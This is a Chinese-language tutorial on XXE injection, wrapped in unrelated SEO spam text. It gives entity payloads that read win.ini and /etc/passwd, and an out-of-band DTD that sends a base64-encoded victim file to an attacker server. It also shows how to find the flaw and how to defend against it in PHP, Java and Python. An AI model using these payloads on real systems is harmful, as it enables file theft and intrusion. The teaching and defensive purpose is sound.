当前位置: 首页 > news >正文

吉林省建设网站做网站找哪家好熊掌号

吉林省建设网站,做网站找哪家好熊掌号,郑州网络公司现状,北京市保障房建设投资中心网站瘫痪1.定义 XML用于标记电子文件使其具有结构性的标记语言#xff0c;可以用来标记数据、定义数据类型#xff0c;是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义#xff08;可选#xff09;、文档元素。 http://www.w3school.com.…1.定义 XML用于标记电子文件使其具有结构性的标记语言可以用来标记数据、定义数据类型是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义可选、文档元素。 http://www.w3school.com.cn/dtd/index.asp   了解地址  2.原理     XXEXML外部实体注入) 在应用程序解析XML输入时当允许引用外部实体时可构造恶意内容导致读取任意文件、探测内网端口、攻击内网网站、发起DoS拒绝服务攻击、执行系统命令等。当运维人员使用了低版本php,libxml低于2.9.1或者程序员设置了libxml_disable_entity_loader(FALSE)就可以加载外部实体。      http://10.0.0.139:92/phpinfo.php   ctrl f    搜索输入内容 默认为false 3.XXE攻击 有回显 ?xml version 1.0? !DOCTYPE note [      !ENTITY hacker SYSTEM file:///c:/windows/win.ini ]  namehacker;/name     //定义DTD文件格式为:root指定根节点名称system声明要使用的外部DTD文件路径如!ENTITY 实体名称 SYSTEM URI/URL  win操作系统读出来就是有xxe漏洞   Linux 读/etc/passswd 无回显 建立*.dtd攻击者服务器  !ENTITY % file SYSTEM php://filter/readconvert.base64encode/resourcefile:///c:/1.txt   //被攻击的文件 !ENTITY % int !ENTITY #37; send SYSTEM http://10.0.0.128:80/?p%file;   //内部的%号要进行实体编码成#37    在被攻击机创建1.txt  攻击机使用apache  apache的日志文件里面查看 解码base64  xml调用 !DOCTYPE convert [  !ENTITY % remote SYSTEM http://10.0.0.128:88/test.dtd %remote;%int;%send; ]  4.如何找xxe漏洞   白盒测试         查看代码里面是否使用了LoadXML( )函数     黑盒测试         抓包看响应体是否存在xml,accept头是否接受xml         抓包修改数据类型把json改成xml来传输数据后面修改一句话         http://web.jarvisoj.com:9882/   例子          出来的样子            json的数据提交            改为xml,下面改为  ?xml version 1.0? !DOCTYPE note [      !ENTITY hacker SYSTEM file:///etc/passwd ] namehacker;/name    打比赛的ctf地址  特征             看到url文件名是否 .ashx后缀扩展名             响应体为xml                  5.防范方法 1、升级php版本 2、程序员修改代码  PHP libxml_disable_entity_loader(true); JAVA: DocumentBuilderFactory dbf DocumentBuilderFactory.newInstance(); dbf.setExpandEntityReferences(false); setFeature(http://apache.org/xml/features/disallow-doctype-decl,true); setFeature(http://xml.org/sax/features/external-general-entities,false) setFeature(http://xml.org/sax/features/external-parameter-entities,false); Python from lxml import etree xmlData etree.parse(xmlSource,etree.XMLParser(resolve_entitiesFalse)) 3、过滤关键词 !DOCTYPE、!ENTITY SYSTEM、PUBLIC
http://www.dnsts.com.cn/news/31292.html

相关文章:

  • 开家网站建设培训口碑营销推广
  • 山东网站建设哪家便宜网站站长统计怎么弄
  • 网站友情链接代码大连网站建设特色
  • 石家庄站布局图农业交易平台网站建设
  • 域名注册局官网苏州网站关键词优化
  • php网站开发专业是做什么的wordpress 头像 插件
  • 厦门手机网站制作能够免费换友链的平台
  • 中天建设集团山西分公司网站文化馆 网站 设计
  • 网站建设ssc源码平台h5制作软件app手机版
  • 网站域名多少钱一年凡客诚品售后服务有哪些
  • 石家庄做网站那家好网站具体流程
  • 北京建设网站哪里好建设银行投诉网站首页
  • 企业做网站有用么wordpress tinymce
  • 做网站需要注意哪些商机网项目
  • dede网站模板页在什么文件夹工业和信息化部发短信
  • 网站开发安全文档深圳网站制作公司信息
  • 威海市建设工程协会网站洛阳seo
  • 如何做好公司网站建设寿光网站建设优化
  • 永济市做网站四川住房建设部网站
  • 网站ui设计收费wordpress主题页脚
  • 邮箱类网站模板html5网站建设基本流程图
  • 口碑好的网站建设服务动态交互图表制作
  • 网站托管服务公司做网站合肥哪家公司好
  • 富顺做网站根据网站开发app
  • 音乐相册制作网站软件制作开发
  • 网站模板中心wordpress discuz建站
  • 345诛仙网站是谁做的运动网站建设主题
  • 建设视频网站要求吗建设模板网站
  • 和外国人做ic生意的网站wordpress-5.0升级未被安装
  • 新乡哪里有做网站的阿里云wordpress安装